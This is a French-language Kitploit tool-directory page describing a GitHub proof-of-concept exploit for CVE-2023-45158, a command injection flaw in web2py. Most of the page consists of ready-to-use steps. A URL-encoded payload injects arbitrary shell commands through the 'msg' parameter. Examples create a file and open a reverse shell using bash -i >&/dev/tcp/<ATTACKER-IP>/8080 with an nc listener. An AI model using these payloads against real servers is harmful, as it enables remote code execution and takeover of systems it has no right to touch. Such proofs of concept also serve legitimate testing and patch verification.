Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-45158 — Preuve de concept d'exploit pour CVE-2023-45158, une vulnérabilité d'injection de commandes dans web2py. Démontre l'exécution de code à distance via des requêtes HTTP conçues, incluant la création de fichiers et des charges utiles de shell inversé. | Kitploit
Outils/GitHubGitHub/yifanzhg/cve-2023-45158
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubyifanzhg/cve-2023-45158

CVE-2023-45158

Preuve de concept d'exploit pour CVE-2023-45158, une vulnérabilité d'injection de commandes dans web2py. Démontre l'exécution de code à distance via des requêtes HTTP conçues, incluant la création de fichiers et des charges utiles de shell inversé.

Voir le dépôt
411il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-45158

Étapes

  1. Lancez le serveur web
root@kitploit:~
cd web2py
python3 web2py.py
  1. Injectez votre commande en utilisant l'URL http://<IP-ADDRESS>:8000/hack?msg=%27%3B<YOUR-COMMAND>%3B%27. Remplacez <IP-ADDRESS> et <YOUR-COMMAND> par vos valeurs.

Exemples

  1. Créez un fichier sur le serveur

http://<IP-ADDRESS>:8000/hack?msg=%27%3Btouch%20hack%3B%27

  1. Shell inversé

Sur la machine de l'attaquant, exécutez nc -l 127.0.0.1 8080

Allez à l'URL http://<IP-ADDRESS>:8000/hack?msg=%27%3Bbash%20-i%20>%26/dev/tcp/<ATTACKER-IP>/8080%200>%26%201%3B%27. Remplacez .

<ATTACKER-IP>
Télécharger l’outil